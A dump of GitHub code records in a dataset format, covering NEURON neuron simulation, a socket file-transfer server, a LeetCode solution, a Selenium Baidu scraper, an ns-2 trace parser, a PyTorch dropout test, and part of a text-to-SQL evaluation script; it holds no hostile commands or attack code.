neuron.hoc.HocObject\n the section into the current clamp will be placed\n x : float\n the possition on the section\n \"\"\"\n self.stim = h.IClamp(section(x))\n\n def insert_SEClamp(self, section, x):\n \"\"\"\n Inserts a single electrode voltage clamp point process to a given section.\n\n Parmaters\n ---------\n section : neuron.hoc.HocObject\n the section into the current clamp will be placed\n x : float\n the possition on the section\n \"\"\"\n self.stim_SEClamp = h.SEClamp(section(x))\n self.stim_SEClamp.dur1 = self.setting['protocol']['SEClamp']['DUR1']\n self.stim_SEClamp.amp1 = self.setting['protocol']['SEClamp']['AMP1']\n\n def connect_ns_terminals(self):\n for sec in self.synapses:\n if len(self.synapses[sec]) > 0:\n i = 0\n while i < len(self.synapses[sec]):\n ns_terminal = single_pulse_NetStim()\n self.ns_terminals.append(ns_terminal)\n\n if self.synapses[sec][i].receptor == 'AMPA':\n self.synapses[sec][i].ns_terminal = ns_terminal\n nc1 = h.NetCon(ns_terminal, self.synapses[sec][i].synapse, 0, 0,\n self.synapses[sec][i].init_weight)\n self.synapses[sec][i].weight_vec.record(nc1._ref_weight[1],\n self.setting['simulation']['RECORDING_STEP'])\n nc1.record(self.synapses[sec][i].input_spikes)\n self.net_cons.append(nc1)\n\n if self.synapses[sec][i + 1].receptor == 'NMDA':\n self.synapses[sec][i + 1].ns_terminal = ns_terminal\n nc2 = h.NetCon(ns_terminal, self.synapses[sec][i + 1].synapse, 0, 0,\n self.synapses[sec][i + 1].init_weight)\n self.net_cons.append(nc2)\n i = i + 2\n\n def set_recording_vectors_dist_tuft(self):\n for sec in self.all_apicals:\n if sec.hname() in self.setting['dends_recordings']:\n d_vecs = []\n na_vecs = []\n calH_ica_vecs = []\n cai_vecs = []\n ogb_vecs = []\n pmp_vecs = []\n for seg in [0.1, 0.5, 0.9]: # for seg in sec.allseg():\n d_vec = RecordingVector(section=sec.hname(), segment_x=seg, vec=h.Vector().record(sec(seg)._ref_v))\n d_vecs.append(d_vec)\n na_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_ina_nax))\n na_vecs.append(na_vec)\n calH_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_ica_calH))\n calH_ica_vecs.append(calH_vec)\n cai_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_cai))\n cai_vecs.append(cai_vec)\n\n self.dend_vecs[sec.hname()] = d_vecs\n self.ina_vecs[sec.hname()] = na_vecs\n self.calH_ica_vecs[sec.hname()] = calH_ica_vecs\n self.cai_vecs[sec.hname()] = cai_vecs\n self.ogb_vecs[sec.hname()] = ogb_vecs\n self.pmp_vecs[sec.hname()] = pmp_vecs\n\n def apply_TTX(self):\n \"\"\"Simulates the application of TTX as a reduction of sodium channel conductance.\"\"\"\n for sec in self.dends:\n if h.ismembrane('nad', sec=sec):\n sec.gbar_nad = sec.gbar_nad * 0.2\n\n\n def set_theta_burst_iclamp(self, stim):\n \"\"\"\n Sets times for current injections for the theta burst pairing stimulation protocol.\n\n Parameters\n ----------\n stim : neuron.hoc.HocObject\n the object of single pulse current clamp point process\n \"\"\"\n stim.delay = 0\n stim.dur = 1e9\n stim.amp = 0\n\n t_start = self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_START']\n t_vec = np.zeros(0)\n for pattern in range(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_PATTERNS_NUM']):\n for burst in range(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_BURSTS_NUM']):\n t_stop = t_start + 1 + (self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_STIMULI_NUM'] - 1) * \\\n self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERSPIKE_INTERVAL']\n burst_vec = np.arange(t_start,\n t_stop,\n self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERSPIKE_INTERVAL'])\n t_vec = np.concatenate((t_vec, burst_vec), axis=0)\n # t_start = t_vec[-1] + self.setting['protocol']['theta_burst_pairing']['TBP_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_PATTERNS_INTERVAL']\n\n t_vec_iclamp = [0]\n for t in t_vec:\n t_vec_iclamp.append(t)\n t_vec_iclamp.append(t)\n t_vec_iclamp.append(t + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_DUR'])\n t_vec_iclamp.append(t + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_DUR'])\n t_vec_iclamp.append(self.setting['simulation']['TSTOP'])\n self.iclamp_t_vec = h.Vector(t_vec_iclamp)\n\n amps_vec = []\n for i in range(len(t_vec_iclamp)):\n if (i % 4 == 0) or (i % 4 == 1):\n amps_vec.append(0.0)\n elif (i % 4 == 2) or (i % 4 == 3):\n amps_vec.append(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_AMP'])\n self.iclamp_amps_vec = h.Vector(amps_vec)\n self.iclamp_amps_vec.play(stim._ref_amp, self.iclamp_t_vec, 1)\n\n def set_theta_burst(self):\n \"\"\"\n Sets the theta burst stimulation protocol using Vecstim objects.\n \"\"\"\n for sec in self.synapses:\n s = 0\n while s < len(self.synapses[sec]):\n t_start = self.setting['protocol']['theta_burst']['TB_START'] + np.random.rand()\n t_vec = np.zeros(0)\n for pattern in range(self.setting['protocol']['theta_burst']['TB_PATTERNS_NUM']):\n for burst in range(self.setting['protocol']['theta_burst']['TB_BURSTS_NUM']):\n t_stop = t_start + 1 + (\n self.setting['protocol']['theta_burst']['TB_STIMULI_NUM'] - 1) * \\\n self.setting['protocol']['theta_burst']['TB_INTERSPIKE_INTERVAL']\n burst_vec = np.arange(t_start, t_stop,\n self.setting['protocol']['theta_burst']['TB_INTERSPIKE_INTERVAL'])\n t_vec = np.concatenate((t_vec, burst_vec), axis=0)\n t_start = t_start + self.setting['protocol']['theta_burst']['TB_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst']['TB_PATTERNS_INTERVAL']\n\n vec = h.Vector(t_vec)\n self.vecs.append(vec)\n vec_stim = h.VecStim()\n vec_stim.play(vec)\n self.vec_stims.append(vec_stim)\n nc_AMPA = h.NetCon(vec_stim, self.synapses[sec][s].ns_terminal, 0, 0, 1)\n self.net_cons.append(nc_AMPA)\n self.synapses[sec][s].stimulated = True\n nc_NMDA = h.NetCon(vec_stim, self.synapses[sec][s + 1].ns_terminal, 0, 0, 1)\n self.net_cons.append(nc_NMDA)\n self.synapses[sec][s + 1].stimulated = True\n s = s + 2\n\n def reset_recording_vectors(self):\n \"\"\"Resets all used recording vectors.\"\"\"\n self.v_vec.resize(0)\n self.t_vec.resize(0)\n self.apc_vec.resize(0)\n self.t_rs_vec.resize(0)\n self.d_vec.resize(0)\n self.p_vec.resize(0)\n\n for sec in self.synapses:\n for syn in self.synapses[sec]:\n syn.weight_vec.resize(0)\n syn.d_amp_vec.resize(0)\n syn.p_amp_vec.resize(0)\n syn.input_spikes.resize(0)\n\n for d in [self.dend_vecs, self.ina_vecs, self.cai_vecs, self.calH_ica_vecs, self.nmda_ica_vecs, self.pmp_vecs]:\n for sec in d:\n for vec in d[sec]:\n vec.vector.resize(0)\n\n for vec in self.spines_v_vecs:\n vec.vector.resize(0)\n\n\ndef genDendLocs(dends, nsyn, spread):\n # insert nsyn synapses to dendrites dends, uniform spread within a branch\n locs = []\n n_dends = len(dends)\n if isinstance(nsyn, list):\n nsyn = np.repeat(nsyn[0], len(dends))\n else:\n nsyn = np.repeat(nsyn, len(dends))\n for i_dend in np.arange(0, n_dends):\n dend = dends[i_dend]\n nsyn_dend = nsyn[i_dend]\n isd = (spread[1] - spread[0]) / float(nsyn_dend)\n pos = np.arange(spread[0], spread[1], isd)[0:nsyn_dend]\n\n if len(pos) != nsyn_dend:\n print('error: synapse number mismatch, stop simulation! dend:', i_dend, 'created=', len(pos), '!=',\n nsyn_dend)\n sys.exit(1)\n for p in pos:\n locs.append([dend, p])\n return locs\n\n\ndef single_pulse_NetStim():\n \"\"\"Sets single pulse NetStim.\"\"\"\n pulse = h.NetStim()\n pulse.interval = 1\n pulse.number = 1\n pulse.start = -1e9\n pulse.noise = 0\n return pulse\n","repo_name":"tomko-neuron/ETDP-CA1","sub_path":"Dist_tuft_LTP_CA1/libcell.py","file_name":"libcell.py","file_ext":"py","file_size_in_byte":16597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33901632287","text":"from server_view import View\nimport json\nimport logging\n\n'''\nPROTOCOL FORMAT\n\nstring terbagi menjadi 2 bagian, dipisahkan oleh spasi\nCOMMAND spasi PARAMETER spasi PARAMETER ...\n\nFITUR\n\n- upload : untuk meletakkan/mengunggah file ke data\n request : upload\n parameter : nama_file yang ingin di upload\n response : berhasil mengupload -> 'File berhasil diupload.'\n gagal mengupload -> error\n\n- lihat : untuk melihat daftar file yang ada di server\n request: lihat\n parameter: tidak ada\n response: daftar file yang ada di server\n\n- download : untuk mengambil/mengunduh file\n request: download\n parameter: nama_file yang ingin di download\n response: berhasil mendownload -> 'File berhasil didownload.'\n gagal mendownload -> error\n\n- jika command tidak dikenali akan merespon dengan ERRCMD\n\n'''\np = View()\n\nclass Machine:\n def proses(self,string_to_process,connection):\n s = string_to_process\n cstring = s.split(\" \")\n try:\n command = cstring[0].strip()\n if (command=='upload'):\n logging.warning(\"mengunggah\")\n nama_file = cstring[1].strip()\n\n \"Menerima ukuran file yang diupload\"\n ukuran_inbyte = connection.recv(4)\n ukuran_asli = int.from_bytes(ukuran_inbyte,byteorder='big')\n\n\n \"Terima File nya\"\n ukuran_diterima = 0\n recv_data=b''\n while ukuran_diterima < ukuran_asli:\n data = connection.recv(64)\n if data:\n recv_data+=data\n ukuran_diterima+=len(data)\n else:\n print(f\"file diterima dari {client_address}\")\n break\n p.upload(nama_file,recv_data)\n\n return \"File berhasil diupload.\"\n\n elif (command=='lihat'):\n logging.warning(\"melihat isi data\")\n hasil = p.lihat()\n return json.dumps(hasil)\n\n elif (command=='download'):\n logging.warning(\"mengunduh\")\n nama = cstring[1].strip()\n\n hasil = p.download(nama)\n if not hasil:\n nol = 0\n nol = nol.to_bytes(4,byteorder='big')\n connection.send(nol)\n return \"File tidak ditemukan dalam data.\"\n ukuran = len(hasil['byte_data'])\n ukuran_inbyte = ukuran.to_bytes(4,byteorder='big')\n connection.send(ukuran_inbyte)\n connection.sendall(hasil['byte_data'])\n return \"File berhasil didownload.\"\n else:\n return \"ERRCMD\"\n except:\n return \"ERROR\"\n\n\nif __name__=='__main__':\n pm = Machine()\n","repo_name":"paramastri/PROGJAR_05111740000019","sub_path":"tugas4/server_machine.py","file_name":"server_machine.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24662515248","text":"# Count the Number of Consistent Strings\n# You are given a string allowed consisting of distinct characters and an array of strings words. A string is consistent if all characters in the string appear in the string allowed.\n# Return the number of consistent strings in the array words.\n\ndef countConsistentStrings (allowed, words) :\n count = 0\n for word in words :\n consistent = True\n for i in word :\n if i not in allowed :\n consistent = False\n break\n if consistent :\n count += 1\n return count\n \nprint(countConsistentStrings(allowed=\"cad\", words=[\"cc\",\"acd\",\"b\",\"ba\",\"bac\",\"bad\",\"ac\",\"d\"]))","repo_name":"vibhatsu08/leetcode-python","sub_path":"countConsistentStrings.py","file_name":"countConsistentStrings.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"874791363","text":"\"\"\"\n 作者:邱晨\n 功能:自学用selenium+PHANTOMJS搜索百度\n 来源:https://zhuanlan.zhihu.com/p/27115580\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport requests\nimport time\n\nuser_agent = (\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) \" +\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36\"\n)\n\ndcap = dict(DesiredCapabilities.PHANTOMJS)\ndcap[\"phantomjs.page.settings.userAgent\"] = user_agent\n\nbrowser = webdriver.PhantomJS(desired_capabilities=dcap, executable_path=r'C:\\Users\\qiuc\\AppData\\Roaming\\npm\\phantomjs.cmd')\nbrowser.set_window_size(1920, 1200) # optional\n\nurl = 'https://www.baidu.com/'\n\ndef get_Content():\n \"\"\"\n 获取搜索内容\n \"\"\"\n results = browser.find_elements_by_class_name('t')\n for result in results:\n print('标题:{}超链接:{}'.format(result.text, result.find_element_by_tag_name('a').get_attribute('href'))) \n else:\n print('----------------------------------------------------------------------------------------') \n\ndef main():\n browser.get(url)\n browser.implicitly_wait(3)\n text = browser.find_element_by_id('kw')\n text.send_keys('python') # 可以输入你自己想要搜索的内容\n browser.find_element_by_id('su').submit()\n get_Content()\n for i in range(2):\n next_btn = browser.find_element_by_class_name('n')\n browser.get(next_btn.get_attribute('href'))\n browser.implicitly_wait(3)\n get_Content()\n\n\nif __name__ == '__main__':\n main()","repo_name":"qiuchen100/Spiders","sub_path":"baidu_get.py","file_name":"baidu_get.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42505454544","text":"# reading event entries from trace.tr\ntrace_file = open(\"trace.tr\", \"r\")\n\nreceived_bytes = 0\ntotay_delay = 0\nsent_packets = 0\nreceived_packets = 0\ndropped_packets = 0\n\nstart_time = 0\nend_time = 0\n\nheader_bytes = 20\n\nsent_time = dict()\n\nfor line in trace_file:\n split_list = line.split()\n\n if start_time == 0:\n start_time = float(split_list[1])\n if end_time < float(split_list[1]):\n end_time = float(split_list[1])\n \n if split_list[6]==\"exp\" and split_list[3]==\"AGT\":\n if split_list[0] == \"s\":\n sent_time[split_list[5]] = split_list[1]\n sent_packets += 1\n if split_list[0] == \"r\":\n received_bytes += int(split_list[7])-header_bytes\n \n delay = float(split_list[1]) - float(sent_time[split_list[5]])\n if delay < 0:\n print(\"Error\")\n totay_delay += delay\n\n received_packets += 1\n if split_list[6]==\"exp\" and split_list[0]==\"D\":\n dropped_packets += 1\n\ntrace_file.close()\n\n# writing statistics to stat.txt\nprint(\"Dropped Packets \",dropped_packets)\n\nnetworkThroughput = (received_bytes*8)/((end_time-start_time)*1000)\nendToEndDelay = totay_delay/received_packets\npacketDeliveryRatio = (received_packets*1.0)/sent_packets*100\npacketDropRatio = (dropped_packets*1.0)/sent_packets*100\n\nstat_file = open(\"stat.txt\", \"a\")\n\nstat_file.write(str(networkThroughput)+\" \"+str(endToEndDelay)+\" \"+str(packetDeliveryRatio)+\" \"+str(packetDropRatio)+\"\\n\")\n\nstat_file.close()","repo_name":"fabihatasneem/CSE322-Networking-Sessional","sub_path":"Offline 2/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22821142826","text":"import random\nimport unittest\n\nimport torch\nimport numpy as np\n\nfrom torchnlp.nn import LockedDropout\n\n\nclass TestLockedDropout(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.input_ = torch.FloatTensor(\n random.randint(1, 10), random.randint(1, 10), random.randint(1, 10))\n self.probability = random.random()\n\n def test_init(self):\n LockedDropout(self.probability)\n\n def test_forward(self):\n dropout = LockedDropout(self.probability)\n output = dropout.forward(self.input_)\n\n # Check sizes\n self.assertEqual(output.size(), self.input_.size())\n\n # Check types\n self.assertEqual(output.type(), 'torch.FloatTensor')\n\n def test_forward_eval(self):\n dropout = LockedDropout(self.probability).eval()\n output = dropout.forward(self.input_)\n\n # Check sizes\n np.equal(output.numpy(), self.input_.numpy())\n","repo_name":"PetrochukM/PyTorch-NLP","sub_path":"tests/nn/test_lock_dropout.py","file_name":"test_lock_dropout.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":2198,"dataset":"github-code","pt":"31"} +{"seq_id":"70968933527","text":"import asyncio\nimport configparser\nimport json\nimport os\nimport shutil\nfrom typing import Tuple, Any, List, Set\nfrom itertools import product\nimport random\nimport re\nimport sqlite3\nfrom collections import defaultdict\n\nimport sqlparse \nfrom ratsql.datasets.spider_lib.process_sql import get_schema, Schema, get_sql\nfrom tqdm import tqdm\nimport time\n\n\nTIMEOUT = 60\nDISABLE_DISTINCT = True\nDISABLE_VALUE = True\n\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nfrom ratsql.datasets.spider_lib.evaluation import build_foreign_key_map_from_json\nconfig = configparser.ConfigParser()\nconfig.read('evaluation_config.ini')\n\ngold_file = config['SPIDER']['DEV_GOLD']\npredicted_response = config['SPIDER']['PREDICTED_RESPONSE']\npredicted_response_json = config['SPIDER']['PREDICTED_RESPONSE_JSON']\ngt_txt = config['SPIDER']['GROUND_TRUTH_TXT']\npred_txt = config['SPIDER']['PRED_TXT']\ndatabase = config['SPIDER']['DATABASE']\ntables = config['SPIDER']['TABLES']\nmetrics_file = config['SPIDER']['METRICS_FILE']\n\n# Convert predicted response to json format \nwith open(predicted_response, 'r') as input_file:\n input_data = input_file.read()\n\nwith open(predicted_response_json, 'w') as output_file:\n data = json.loads(input_data)\n json_str = json.dumps(data)\n output_file.write(json_str)\n\n# Create ground truth text files\nshutil.copyfile(gold_file, gt_txt)\n\n# # Create predicted truth text files\nwith open(pred_txt, 'w') as f:\n for i in range(len(data['per_item'])):\n f.write(data['per_item'][i]['predicted'] +'\\n')\n \n\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", '/')\n\nwith open(gt_txt) as f:\n glist = []\n gseq_one = []\n for l in f.readlines():\n if len(l.strip()) == 0:\n glist.append(gseq_one)\n gseq_one = []\n else:\n lstrip = l.strip().split('\\t')\n gseq_one.append(lstrip)\n if len(gseq_one) != 0:\n glist.append(gseq_one)\n\nwith open(pred_txt) as f:\n plist = []\n pseq_one = []\n for l in f.readlines():\n if len(l.strip()) == 0:\n plist.append(pseq_one)\n pseq_one = []\n\n else:\n pseq_one.append(l.strip().split('\\t'))\n if len(pseq_one) != 0:\n plist.append(pseq_one)\n\n\ndef condition_has_or(conds):\n return 'or' in conds[1::2]\n\n\ndef condition_has_like(conds):\n return WHERE_OPS.index('like') in [cond_unit[1] for cond_unit in conds[::2]]\n\n\ndef condition_has_sql(conds):\n for cond_unit in conds[::2]:\n val1, val2 = cond_unit[3], cond_unit[4]\n if val1 is not None and type(val1) is dict:\n return True\n if val2 is not None and type(val2) is dict:\n return True\n return False\n\n\ndef val_has_op(val_unit):\n return val_unit[0] != UNIT_OPS.index('none')\n\n\ndef has_agg(unit):\n return unit[0] != AGG_OPS.index('none')\n\n\ndef accuracy(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef recall(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef F1(acc, rec):\n if (acc + rec) == 0:\n return 0\n return (2. * acc * rec) / (acc + rec)\n\n\ndef get_scores(count, pred_total, label_total):\n if pred_total != label_total:\n return 0,0,0\n elif count == pred_total:\n return 1,1,1\n return 0,0,0\n\n\ndef eval_sel(pred, label):\n pred_sel = pred['select'][1]\n label_sel = label['select'][1]\n label_wo_agg = [unit[1] for unit in label_sel]\n pred_total = len(pred_sel)\n label_total = len(label_sel)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_sel:\n if unit in label_sel:\n cnt += 1\n label_sel.remove(unit)\n if unit[1] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[1])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_where(pred, label):\n pred_conds = [unit for unit in pred['where'][::2]]\n label_conds = [unit for unit in label['where'][::2]]\n label_wo_agg = [unit[2] for unit in label_conds]\n pred_total = len(pred_conds)\n label_total = len(label_conds)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_conds:\n if unit in label_conds:\n cnt += 1\n label_conds.remove(unit)\n if unit[2] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[2])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_group(pred, label):\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n pred_total = len(pred_cols)\n label_total = len(label_cols)\n cnt = 0\n pred_cols = [pred.split(\".\")[1] if \".\" in pred else pred for pred in pred_cols]\n label_cols = [label.split(\".\")[1] if \".\" in label else label for label in label_cols]\n for col in pred_cols:\n if col in label_cols:\n cnt += 1\n label_cols.remove(col)\n return label_total, pred_total, cnt\n\n\ndef eval_having(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['groupBy']) > 0:\n pred_total = 1\n if len(label['groupBy']) > 0:\n label_total = 1\n\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n if pred_total == label_total == 1 \\\n and pred_cols == label_cols \\\n and pred['having'] == label['having']:\n cnt = 1\n\n return label_total, pred_total, cnt\n\n\ndef eval_order(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['orderBy']) > 0:\n pred_total = 1\n if len(label['orderBy']) > 0:\n label_total = 1\n if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and \\\n ((pred['limit'] is None and label['limit'] is None) or (pred['limit'] is not None and label['limit'] is not None)):\n cnt = 1\n return label_total, pred_total, cnt\n\n\ndef eval_and_or(pred, label):\n pred_ao = pred['where'][1::2]\n label_ao = label['where'][1::2]\n pred_ao = set(pred_ao)\n label_ao = set(label_ao)\n\n if pred_ao == label_ao:\n return 1,1,1\n return len(pred_ao),len(label_ao),0\n\n\ndef get_nestedSQL(sql):\n nested = []\n for cond_unit in sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]:\n if type(cond_unit[3]) is dict:\n nested.append(cond_unit[3])\n if type(cond_unit[4]) is dict:\n nested.append(cond_unit[4])\n if sql['intersect'] is not None:\n nested.append(sql['intersect'])\n if sql['except'] is not None:\n nested.append(sql['except'])\n if sql['union'] is not None:\n nested.append(sql['union'])\n return nested\n\n\ndef eval_nested(pred, label):\n label_total = 0\n pred_total = 0\n cnt = 0\n if pred is not None:\n pred_total += 1\n if label is not None:\n label_total += 1\n if pred is not None and label is not None:\n cnt += Evaluator().eval_exact_match(pred, label)\n return label_total, pred_total, cnt\n\n\ndef eval_IUEN(pred, label):\n lt1, pt1, cnt1 = eval_nested(pred['intersect'], label['intersect'])\n lt2, pt2, cnt2 = eval_nested(pred['except'], label['except'])\n lt3, pt3, cnt3 = eval_nested(pred['union'], label['union'])\n label_total = lt1 + lt2 + lt3\n pred_total = pt1 + pt2 + pt3\n cnt = cnt1 + cnt2 + cnt3\n return label_total, pred_total, cnt\n\n\ndef get_keywords(sql):\n res = set() \n if len(sql['where']) > 0:\n res.add('where')\n if len(sql['groupBy']) > 0:\n res.add('group')\n if len(sql['having']) > 0:\n res.add('having')\n if len(sql['orderBy']) > 0:\n res.add(sql['orderBy'][0])\n res.add('order')\n if sql['limit'] is not None:\n res.add('limit')\n if sql['except'] is not None:\n res.add('except')\n if sql['union'] is not None:\n res.add('union')\n if sql['intersect'] is not None:\n res.add('intersect')\n\n # or keyword\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n if len([token for token in ao if token == 'or']) > 0:\n res.add('or')\n\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n # not keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[0]]) > 0:\n res.add('not')\n\n # in keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('in')]) > 0:\n res.add('in')\n\n # like keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')]) > 0:\n res.add('like')\n\n return res\n\n\ndef eval_keywords(pred, label):\n pred_keywords = get_keywords(pred)\n label_keywords = get_keywords(label)\n pred_total = len(pred_keywords)\n label_total = len(label_keywords)\n cnt = 0\n\n for k in pred_keywords:\n if k in label_keywords:\n cnt += 1\n return label_total, pred_total, cnt\n\n\ndef count_agg(units):\n return len([unit for unit in units if has_agg(unit)])\n\n\ndef count_component1(sql):\n count = 0\n if len(sql['where']) > 0:\n count += 1\n if len(sql['groupBy']) > 0:\n count += 1\n if len(sql['orderBy']) > 0:\n count += 1\n if sql['limit'] is not None:\n count += 1\n if len(sql['from']['table_units']) > 0: # JOIN\n count += len(sql['from']['table_units']) - 1\n\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n count += len([token for token in ao if token == 'or'])\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n count += len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')])\n\n return count\n\n\ndef count_component2(sql):\n nested = get_nestedSQL(sql)\n return len(nested)\n\n\ndef count_others(sql):\n count = 0\n # number of aggregation\n agg_count = count_agg(sql['select'][1])\n agg_count += count_agg(sql['where'][::2])\n agg_count += count_agg(sql['groupBy'])\n if len(sql['orderBy']) > 0:\n agg_count += count_agg([unit[1] for unit in sql['orderBy'][1] if unit[1]] +\n [unit[2] for unit in sql['orderBy'][1] if unit[2]])\n agg_count += count_agg(sql['having'])\n if agg_count > 1:\n count += 1\n\n # number of select columns\n if len(sql['select'][1]) > 1:\n count += 1\n\n # number of where conditions\n if len(sql['where']) > 1:\n count += 1\n\n # number of group by clauses\n if len(sql['groupBy']) > 1:\n count += 1\n\n return count\n\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\n\nclass Evaluator:\n \"\"\"A simple evaluator\"\"\"\n def __init__(self):\n self.partial_scores = None\n\n def eval_hardness(self, sql):\n count_comp1_ = count_component1(sql)\n count_comp2_ = count_component2(sql)\n count_others_ = count_others(sql)\n\n if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:\n return \"easy\"\n elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \\\n (count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):\n return \"medium\"\n elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \\\n (2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \\\n (count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):\n return \"hard\"\n else:\n return \"extra\"\n\n def eval_exact_match(self, pred, label):\n partial_scores = self.eval_partial_match(pred, label)\n self.partial_scores = partial_scores\n\n for key, score in partial_scores.items():\n if score['f1'] != 1:\n return 0\n\n if len(label['from']['table_units']) > 0:\n label_tables = sorted(label['from']['table_units'])\n pred_tables = sorted(pred['from']['table_units'])\n return label_tables == pred_tables\n return 1\n\n def eval_partial_match(self, pred, label):\n res = {}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_group(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_having(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_order(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_and_or(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_IUEN(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_keywords(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n return res\n \ndef postprocess(query: str) -> str:\n query = query.replace('> =', '>=').replace('< =', '<=').replace('! =', '!=')\n return query\n\ndef remove_distinct(s):\n toks = [t.value for t in list(sqlparse.parse(s)[0].flatten())]\n return ''.join([t for t in toks if t.lower() != 'distinct'])\n\n\ndef replace_cur_year(query: str) -> str:\n return re.sub(\n 